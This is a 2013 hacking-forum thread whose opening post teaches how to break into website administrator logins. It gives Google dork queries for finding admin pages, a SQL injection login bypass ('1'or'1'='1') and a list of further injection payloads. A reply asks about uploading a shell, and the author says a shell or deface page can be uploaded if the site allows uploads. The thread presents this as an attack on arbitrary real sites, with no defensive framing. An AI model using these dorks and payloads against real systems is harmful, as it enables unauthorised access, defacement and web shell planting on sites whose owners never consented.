HomeclosedFAQRegisterLog in

Share | 
 

  Hacking Admin Account

Go down 
AuthorMessage
V1P3R
WhiteHat Support
WhiteHat Support
avatar

Posts : 76
White Hat Points : 202
White Hat Reputation : 10
Join date : 2013-07-30

PostSubject: Hacking Admin Account    Tue Aug 20, 2013 7:51 am

We're gonna hack into an admin account, using SQL injections.

How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Dorks:
Code:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
Step 1: Go to [You must be registered and logged in to see this link.] type in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).
[You must be registered and logged in to see this image.]

Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.


Step 3: Go to the website admin login page, type in:
Code:
username: 1'or'1'='1
password: 1'or'1'='1
[You must be registered and logged in to see this image.]

DONE!  WE ARE NOW LOGGED AS ADMINISTRATOR !

[You must be registered and logged in to see this image.]

Other Injection Queries:
Code:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a

_________________
Mess with the Best, Die like the Rest
Back to top Go down
Darkgoogly
Member
Member


Posts : 1
White Hat Points : 1
White Hat Reputation : 0
Join date : 2013-09-04

PostSubject: Re: Hacking Admin Account    Wed Sep 04, 2013 7:40 pm

After That can i upload Shell??
Back to top Go down
V1P3R
WhiteHat Support
WhiteHat Support
avatar

Posts : 76
White Hat Points : 202
White Hat Reputation : 10
Join date : 2013-07-30

PostSubject: Re: Hacking Admin Account    Thu Sep 05, 2013 7:35 am

Darkgoogly wrote:
After That can i upload Shell??
It depends. If that site has upload button you can upload your shell or deface page Smile

_________________
Mess with the Best, Die like the Rest
Back to top Go down
Sponsored content




PostSubject: Re: Hacking Admin Account    

Back to top Go down
 
Hacking Admin Account
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical White Hat Hackers :: White Hat Hackers Community :: Hacking & Security Tutorials-
Jump to: